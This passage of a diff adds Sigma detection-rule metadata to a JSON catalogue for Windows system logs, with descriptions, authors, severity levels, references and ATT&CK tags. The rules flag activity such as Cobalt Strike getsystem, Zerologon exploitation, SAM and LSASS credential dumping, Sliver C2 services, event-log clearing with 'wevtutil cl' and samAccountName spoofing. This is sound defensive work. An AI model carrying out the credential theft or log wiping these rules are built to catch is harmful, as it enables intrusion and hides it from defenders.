"843544a7-56e0-4dcc-a44f-5cc266dd97d6", + "value": "Meterpreter or Cobalt Strike Getsystem Service Installation - System" + }, + { + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/05/06", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_moriya_rootkit.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_moriya_rootkit.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "value": "Moriya Rootkit - System" + }, + { + "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/01/11", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_system_ntfs_vuln_exploit.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/jonasLyk/status/1347900440000811010", + "https://twitter.com/wdormann/status/1347958161609809921", + "https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_ntfs_vuln_exploit.yml" + ], + "tags": [ + "attack.impact", + "attack.t1499.001" + ] + }, + "uuid": "f14719ce-d3ab-4e25-9ce6-2899092260b0", + "value": "NTFS Vulnerability Exploitation" + }, + { + "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", + "meta": { + "author": "Cian Heasley", + "creation_date": "2020/06/10", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_pcap_drivers.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://ragged-lab.blogspot.com/2020/06/capturing-pcap-driver-installations.html#more", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_pcap_drivers.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.t1040" + ] + }, + "uuid": "7b687634-ab20-11ea-bb37-0242ac130002", + "value": "Windows Pcap Drivers" + }, + { + "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", + "meta": { + "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": "No established falsepositives", + "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.secura.com/blog/zero-logon", + "https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" + ], + "tags": [ + "attack.t1210", + "attack.lateral_movement" + ] + }, + "uuid": "18f37338-b9bd-4117-a039-280c81f7a596", + "value": "Zerologon Exploitation Using Well-known Tools" + }, + { + "description": "Detects powershell script installed as a Service", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_powershell_script_installed_as_service.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_powershell_script_installed_as_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", + "value": "PowerShell Scripts Installed as Services" + }, + { + "description": "Detects QuarksPwDump clearing access history in hive", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/05/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_quarkspwdump_clearing_hive_access_history.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "39f919f3-980b-4e6f-a975-8af7e507ef2b", + "value": "QuarksPwDump Clearing Access History" + }, + { + "description": "Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/08", + "falsepositive": [ + "Software installation", + "Software updates" + ], + "filename": "win_system_rare_service_installs.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_rare_service_installs.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ] + }, + "uuid": "66bfef30-22a5-4fcd-ad44-8d81e60922ae", + "value": "Rare Service Installations" + }, + { + "description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708", + "meta": { + "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", + "creation_date": "2019/05/24", + "falsepositive": [ + "Bad connections or network interruptions" + ], + "filename": "win_system_rdp_potential_cve_2019_0708.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/zerosum0x0/CVE-2019-0708", + "https://github.com/Ekultek/BlueKeep", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_rdp_potential_cve_2019_0708.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" + ] + }, + "uuid": "aaa5b30d-f418-420b-83a0-299cb6024885", + "value": "Potential RDP Exploit CVE-2019-0708" + }, + { + "description": "Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/11", + "falsepositive": [ + "Legitimate usage of the anydesk tool" + ], + "filename": "win_system_service_install_anydesk.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_anydesk.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "530a6faa-ff3d-4022-b315-50828e77eef5", + "value": "Anydesk Remote Access Software Service Installation" + }, + { + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/21", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_service_install_hacktools.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_hacktools.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "d26ce60c-2151-403c-9a42-49420d87b5e4", + "value": "Hacktool Service Registration or Execution" + }, + { + "description": "Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/28", + "falsepositive": [ + "Legitimate use of the tool" + ], + "filename": "win_system_service_install_mesh_agent.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_mesh_agent.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", + "value": "Mesh Agent Service Installation" + }, + { + "description": "Detects NetSupport Manager service installation on the target system.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/31", + "falsepositive": [ + "Legitimate use of the tool" + ], + "filename": "win_system_service_install_netsupport_manager.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "http://resources.netsupportsoftware.com/resources/manualpdfs/nsm_manual_uk.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_netsupport_manager.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", + "value": "NetSupport Manager Service Install" + }, + { + "description": "Detects PAExec service installation", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_service_install_paexec.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.poweradmin.com/paexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_paexec.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", + "value": "PAExec Service Installation" + }, + { + "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/22", + "falsepositive": [ + "Legitimate use of the tool" + ], + "filename": "win_system_service_install_pdqdeploy.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_pdqdeploy.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", + "value": "New PDQDeploy Service - Server Side" + }, + { + "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/22", + "falsepositive": [ + "Legitimate use of the tool" + ], + "filename": "win_system_service_install_pdqdeploy_runner.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_pdqdeploy_runner.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "b98a10af-1e1e-44a7-bab2-4cc026917648", + "value": "New PDQDeploy Service - Client Side" + }, + { + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/06/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_service_install_psexec.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_psexec.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "42c575ea-e41e-41f1-b248-8093c3e82a28", + "value": "PsExec Service Installation" + }, + { + "description": "Detects Remote Utilities Host service installation on the target system.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/31", + "falsepositive": [ + "Legitimate use of the tool" + ], + "filename": "win_system_service_install_remote_utilities.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.remoteutilities.com/support/kb/host-service-won-t-start/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_remote_utilities.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", + "value": "Remote Utilities Host Service Install" + }, + { + "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2022/08/25", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_service_install_sliver.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231", + "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_sliver.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1569.002" + ] + }, + "uuid": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "value": "Sliver C2 Default Service Installation" + }, + { + "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/05", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_service_install_susp_double_ampersand.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_susp_double_ampersand.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "value": "New Service Uses Double Ampersand in Path" + }, + { + "description": "Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/28", + "falsepositive": [ + "Legitimate use of the tool" + ], + "filename": "win_system_service_install_tacticalrmm.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_tacticalrmm.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "4bb79b62-ef12-4861-981d-2aab43fab642", + "value": "TacticalRMM Service Installation" + }, + { + "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", + "meta": { + "author": "Dimitrios Slamaris", + "creation_date": "2017/05/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_dhcp_config.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", + "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", + "value": "DHCP Server Loaded the CallOut DLL" + }, + { + "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", + "meta": { + "author": "Dimitrios Slamaris, @atc_project (fix)", + "creation_date": "2017/05/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_dhcp_config_failed.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", + "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config_failed.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "value": "DHCP Server Error Failed Loading the CallOut DLL" + }, + { + "description": "One of the Windows Core Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "meta": { + "author": "Florian Roth, Tim Shelton", + "creation_date": "2022/05/17", + "falsepositive": [ + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" + ], + "filename": "win_system_susp_eventlog_cleared.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/deviouspolack/status/832535435960209408", + "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_eventlog_cleared.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" + ] + }, + "uuid": "100ef69e-3327-481c-8e5c-6d80d9507556", + "value": "System Eventlog Cleared" + }, + { + "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/27", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_system_susp_proceshacker.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/1kwpeter/status/1397816101455765504", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_proceshacker.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1569.002" + ] + }, + "uuid": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", + "value": "ProcessHacker Privilege Elevation" + }, + { + "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_rtcore64_service_install.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_rtcore64_service_install.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", + "value": "RTCore Suspicious Service Installation" + }, + { + "description": "Detects suspicious SAM dump activity as cause by QuarksPwDump and other password dumpers", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/01/27", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_sam_dump.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_sam_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "839dd1e8-eda8-4834-8145-01beeee33acd", + "value": "SAM Dump to AppData" + }, + { + "description": "Detects suspicious service installation commands", + "meta": { + "author": "pH-T", + "creation_date": "2022/03/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_service_installation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ] + }, + "uuid": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "value": "Suspicious Service Installation" + }, + { + "description": "Detects service installation in suspicious folder appdata", + "meta": { + "author": "pH-T", + "creation_date": "2022/03/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_service_installation_folder.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_folder.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ] + }, + "uuid": "5e993621-67d4-488a-b9ae-b420d08b96cb", + "value": "Service Installation in Suspicious Folder" + }, + { + "description": "Detects service installation with suspicious folder patterns", + "meta": { + "author": "pH-T", + "creation_date": "2022/03/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_service_installation_folder_pattern.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_folder_pattern.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ] + }, + "uuid": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", + "value": "Service Installation with Suspicious Folder Pattern" + }, + { + "description": "Detects suspicious service installation scripts", + "meta": { + "author": "pH-T", + "creation_date": "2022/03/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_service_installation_script.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_script.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ] + }, + "uuid": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", + "value": "Suspicious Service Installation Script" + }, + { + "description": "Windows Update get some error Check if need a 0-days KB", + "meta": { + "author": "frack113", + "creation_date": "2021/12/04", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_system_update_error.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_system_update_error.yml" + ], + "tags": [ + "attack.impact", + "attack.resource_development", + "attack.t1584" + ] + }, + "uuid": "13cfeb75-9e33-4d04-b0f7-ab8faaa95a59", + "value": "Windows Update Error" + }, + { + "description": "During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server", + "meta": { + "author": "Cybex", + "creation_date": "2022/08/16", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://packetstormsecurity.com/files/166692/Windows-User-Profile-Service-Privlege-Escalation.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "52a85084-6989-40c3-8f32-091e12e17692", + "value": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919" + }, + { + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_system_service_installation_by_unusal_client.yml", + "level": "high", + "logsource.category": "system", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_system_service_installation_by_unusal_client.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ] + }, + "uuid": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", + "value": "Service Installed By Unusual Client - System" + }, + { + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", + "meta": { + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate OpenVPN TAP insntallation" + ], + "filename": "win_system_tap_driver_installation.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_tap_driver_installation.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048" + ] + }, + "uuid": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", + "value": "Tap Driver Installation" + }, + { + "description": "Detects volume shadow copy mount via windows event log", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "creation_date": "2020/10/20", + "falsepositive": [ + "Legitimate use of volume shadow copy mounts (backups maybe)." + ], + "filename": "win_system_volume_shadow_copy_mount.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_volume_shadow_copy_mount.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "f512acbf-e662-4903-843e-97ce4652b740", + "value": "Volume Shadow Copy Mount" + }, + { + "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", + "meta": { + "author": "NVISO", + "creation_date": "2020/09/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_vul_cve_2020_1472.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_vul_cve_2020_1472.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "a0cb7110-edf0-47a4-9177-541a4083128a", + "value": "Vulnerable Netlogon Secure Channel Connection Allowed" + }, + { + "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_vul_cve_2021_42278_or_cve_2021_42287.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_vul_cve_2021_42278_or_cve_2021_42287.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ] + }, + "uuid": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f", + "value": "Exploit SamAccountName Spoofing with Kerberos" + }, + { + "description": "This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names.", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/17", + "falsepositive": [ + "Software installation" + ], + "filename": "win_rare_schtask_creation.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_rare_schtask_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.s0111", + "attack.t1053.005" + ] + }, + "uuid": "b20f6158-9438-41be-83da-a5a16ac90c2b", + "value": "Rare Scheduled Task Creations" + }, + { + "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/05", + "falsepositive": [ + "Unknown" + ], + "filename": "win_task_scheduler_susp_task_locations.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_task_scheduler_susp_task_locations.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "424273ea-7cf8-43a6-b712-375f925e481f", + "value": "Suspicious Scheduled Tasks Locations" + }, + { + "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/29", + "falsepositive": [ + "Unknown" + ], + "filename": "win_terminalservices_rdp_ngrok.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", + "https://ngrok.com/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "64d51a51-32a6-49f0-9f3d-17e34d640272", + "value": "Ngrok Usage with Remote Desktop Service" + }, + { + "description": "Detects Access to LSASS Process", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/08/26", + "falsepositive": [ + "Google Chrome GoogleUpdate.exe", + "Some Taskmgr.exe related activity" + ], + "filename": "win_defender_alert_lsass_access.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard?WT.mc_id=twitter", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_alert_lsass_access.yml" + ], + "tags": 